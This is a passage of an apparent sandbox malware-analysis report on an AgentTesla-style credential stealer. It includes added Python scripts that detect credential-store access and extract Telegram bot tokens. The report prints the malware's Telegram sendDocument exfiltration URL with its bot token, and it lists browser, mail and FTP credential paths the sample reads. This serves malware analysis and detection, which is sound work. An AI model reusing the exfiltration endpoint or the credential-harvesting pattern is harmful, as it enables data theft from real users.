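    # A raw string cannot end in a backslash, so the trailing one is appended.
    f"Source: {MALWARE}File opened: " + r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect" + "\\",
    f"Source: {MALWARE}File opened: " + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    f"Source: {MALWARE}File opened: " + r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    f"Source: {MALWARE}File opened: " + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies",
    f"Source: {CHROME} File opened: " + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies",
    "Source: " + r"C:\Windows\explorer.exe File opened: C:\Users\user\Documents\notes.txt",
]

if __name__ == "__main__":
    for proc, result in detect(SAMPLE_EVENTS).items():
        flag = "ALERT" if result["alert"] else "ok"
        print(f"{flag:5} {proc}: families={result['families']} stores={len(result['stores'])}")
```

The threshold is deliberately on application families rather than on raw path count: a single mail client legitimately opens its own profile, and a browser its own cookie database, but nothing benign reads Thunderbird, WinSCP, FileZilla and Chrome stores from one process within a short window.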

Remote Access Functionality

Source: Yara match | File source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
ATT&CK matrix (one line per tactic; the digits in brackets are the badge digits shown beside a technique in the original matrix, techniques without brackets carry no badge):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [211]; Scheduled Task/Job [1]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Scheduled Task/Job [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [111]; Scheduled Task/Job [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [3]; Software Packing [13]; Timestomp [1]; Masquerading [1]; Virtualization/Sandbox Evasion [131]; Process Injection [111]
Credential Access: OS Credential Dumping [2]; Input Capture [111]; Credentials in Registry [1]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery [1]; System Information Discovery [114]; Query Registry [1]; Security Software Discovery [311]; Process Discovery [1]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; Remote System Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [111]; Clipboard Data [1]; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Web Service [1]; Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph (ID: 679221; Sample: wKQpOZ58Gl; Startdate: 05/08/2022; Architecture: WINDOWS; Score: 100)

Top-level signatures:
• Snort IDS alert for network traffic
• Malicious sample detected (through community Yara rule)
• Antivirus detection for dropped file
• 13 other signatures

Process tree:
wKQpOZ58Gl.exe (started)
    dropped: C:\Users\user\AppData\...\kqruryFrIFc.exe (PE32)
    dropped: C:\Users\...\kqruryFrIFc.exe:Zone.Identifier (ASCII)
    dropped: C:\Users\user\AppData\Local\...\tmp92BC.tmp (XML)
    dropped: C:\Users\user\AppData\...\wKQpOZ58Gl.exe.log (ASCII)
    signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
    -> wKQpOZ58Gl.exe (started)
        network: api.telegram.org (149.154.167.220; ports 443, 49783, 49785; TELEGRAMRU; United Kingdom); 192.168.2.1 (unknown, unknown)
        signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
    -> powershell.exe (started)
        -> conhost.exe (started)
    -> schtasks.exe (started)
        -> conhost.exe (started)
    -> wKQpOZ58Gl.exe (started)

Antivirus detection (submitted file):
Source | Detection | Scanner | Label
wKQpOZ58Gl.exe | 58% | Virustotal | -
wKQpOZ58Gl.exe | 26% | Metadefender | -
wKQpOZ58Gl.exe | 69% | ReversingLabs | Win32.Trojan.Woreflint
wKQpOZ58Gl.exe | 100% | Avira | TR/AD.AgentTesla.gcmza
wKQpOZ58Gl.exe | 100% | Joe Sandbox ML | -

Antivirus detection (dropped file):
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | 100% | Avira | TR/AD.AgentTesla.gcmza
C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | 58% | Virustotal | -
C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | 26% | Metadefender | -
C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | 69% | ReversingLabs | Win32.Trojan.Woreflint

Antivirus detection (unpacked PE file):
Source | Detection | Scanner | Label
14.0.wKQpOZ58Gl.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

Domains: No Antivirus matches
Antivirus detection (URLs):
Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://api.ipify.org%%startupfolder% | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://dhp6cb4d3QXSx5sRl.net | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://sOkRpA.com | 0% | Virustotal | -
http://sOkRpA.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://api.telegram.org4 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://api.ipify.org% | 0% | URL Reputation | safe
https://api.telegram.orgD8 | 0% | URL Reputation | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | - | high

URLs:
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument | false | - | high
URLs found in memory and binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.apache.org/licenses/LICENSE-2.0 | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designersG | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/ | wKQpOZ58Gl.exe, 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers/? | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocumentdocument----- | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers? | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/princ3od/MaterialSurfaceKhttps://www.linkedin.com/in/princ3od/%princ3od | wKQpOZ58Gl.exe, kqruryFrIFc.exe.0.dr | false | - | high
http://www.fontbureau.com/designers | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.ipify.org%%startupfolder% | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | low
http://www.goodfont.co.kr | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://dhp6cb4d3QXSx5sRl.net | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639182904.0000000002C49000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://sOkRpA.com | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org4 | wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fonts.com | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sandoll.co.kr | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | wKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sakkal.com | wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org% | wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://api.telegram.orgD8 | wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false

Private IPs:
192.168.2.1
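The URL tables above show the sample's exfiltration channel: the Telegram Bot API, with the bot token embedded in the URL path and sendDocument as the method. The script below is an added example, not part of the Joe Sandbox report: it carves bot tokens and API methods out of a string dump, produces defanged indicators, and illustrates what a proxy log reveals, namely that the token sits inside the HTTPS path, so on the wire only api.telegram.org (DNS, SNI or CONNECT) is visible unless TLS is terminated. Assumptions made here: the token secret is taken to be exactly 35 characters (the length of the one in the report), the method allowlist is limited to a few Bot API methods, and both STRINGS (built from the report's URL table) and PROXY_LOG are constructed samples.

```python
"""Telegram Bot API C2 indicators from carved strings.

Added example, not from the Joe Sandbox report. Extracts bot tokens and API
methods from a string dump and matches them against constructed proxy logs.
"""
import re

# "<numeric bot id>:<35-character secret>" as it appears in Bot API URLs.
# The fixed secret length is an assumption taken from the token in the report;
# it also stops the match from swallowing junk that memory carving appends.
TOKEN_RE = re.compile(r"bot(?P<bot_id>\d{6,12}):(?P<secret>[A-Za-z0-9_-]{35})")

# Method directly after the token. Carved strings can continue with garbage
# ("sendDocumentdocument-----"), so match an allowlist rather than \w+.
METHOD_RE = re.compile(
    r"api\.telegram\.org/bot\d{6,12}:[A-Za-z0-9_-]{35}/"
    r"(?P<method>sendDocument|sendMessage|sendPhoto|getMe|getUpdates)"
)


def extract_bot_tokens(strings):
    """Unique (bot_id, secret) pairs found in the strings, sorted."""
    return sorted({(m.group("bot_id"), m.group("secret"))
                   for s in strings for m in TOKEN_RE.finditer(s)})


def extract_methods(strings):
    """Bot API methods the strings reference, sorted."""
    return sorted({m.group("method") for s in strings for m in METHOD_RE.finditer(s)})


def defang(token):
    """Shareable form: domain defanged, secret truncated to its ends."""
    bot_id, secret = token
    return f"api[.]telegram[.]org/bot{bot_id}:{secret[:4]}...{secret[-4:]}"


def indicators(strings):
    """Indicator bundle for blocking (domain) and hunting (URI prefixes)."""
    tokens = extract_bot_tokens(strings)
    return {
        "domain": "api.telegram.org",
        "uri_prefixes": [f"/bot{b}:{s}/" for b, s in tokens],
        "methods": extract_methods(strings),
        "defanged": [defang(t) for t in tokens],
    }


def hunt(proxy_lines, tokens):
    """Index proxy-log lines by what they can reveal.

    "domain": lines mentioning api.telegram.org, visible even with intact TLS
    (DNS, SNI, CONNECT). "token": lines carrying the full bot token in a URI,
    which exist only where TLS is terminated and full URLs are logged.
    """
    hits = {"domain": [], "token": []}
    for i, line in enumerate(proxy_lines):
        if "api.telegram.org" in line.lower():
            hits["domain"].append(i)
        if any(f"bot{b}:{s}" in line for b, s in tokens):
            hits["token"].append(i)
    return hits


# Constructed sample strings, taken from the URLs listed in the report.
STRINGS = [
    "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument",
    "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocumentdocument-----",
    "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/",
    "https://api.telegram.orgD8",
    "https://api.ipify.org%",
]

# Constructed proxy log: a CONNECT (TLS intact), a decrypted POST, and noise.
PROXY_LOG = [
    "2022-08-05T12:24:10Z 192.168.2.22 CONNECT api.telegram.org:443 200",
    "2022-08-05T12:24:11Z 192.168.2.22 POST https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument 200",
    "2022-08-05T12:25:00Z 192.168.2.31 GET https://www.bing.com/ 200",
]

if __name__ == "__main__":
    ioc = indicators(STRINGS)
    print("defanged:", ioc["defanged"])
    print("methods:", ioc["methods"])
    print("proxy hits:", hunt(PROXY_LOG, extract_bot_tokens(STRINGS)))
```

The split between "domain" and "token" hits is the practical point: a DNS or SNI block on api.telegram.org is the only control that works without TLS interception, but it also blocks legitimate Telegram bot traffic, whereas a token-specific rule is precise and only works on logs taken after TLS termination.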
                                                    Joe Sandbox Version:35.0.0 Citrine
                                                    Analysis ID:679221
                                                    Start date and time: 05/08/202212:22:042022-08-05 12:22:04 +02:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 21s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:wKQpOZ58Gl (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:26
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@11/9@2/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:23:31 | API Interceptor | 507x Sleep call for process: wKQpOZ58Gl.exe modified
12:23:38 | API Interceptor | 22x Sleep call for process: powershell.exe modified
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1308
                                                    Entropy (8bit):5.345811588615766
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                    MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                    SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                    SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                    SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):22140
                                                    Entropy (8bit):5.606020442711728
                                                    Encrypted:false
                                                    SSDEEP:384:2tCDBCVRplZiWlovXSB+kjultIQ87nvOL3Ss3YEMtEm+e+AV7kjWDwLYI++BYv:CRplw2o/4NCltLzDKK4oKB
                                                    MD5:5194DEF9DA74FB9BDB66C72345F51F77
                                                    SHA1:E133CA2899438B5BFFC0D9C07B239DA11FB7A027
                                                    SHA-256:B227685E644F4F90A63543D29B18F2B1066913A43E2B4D80550828EFEF49481F
                                                    SHA-512:F304A557D7931353E5D708AA853EDA34B3736852BC741B6D0BA7CA020483D066BDA7150689A813F038DD51FE4027CAA14FFAE949B8008A3955FDEADAB7D0E948
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e...........W........... .......>.y..............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:XML 1.0 document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1610
                                                    Entropy (8bit):5.1196240690424615
                                                    Encrypted:false
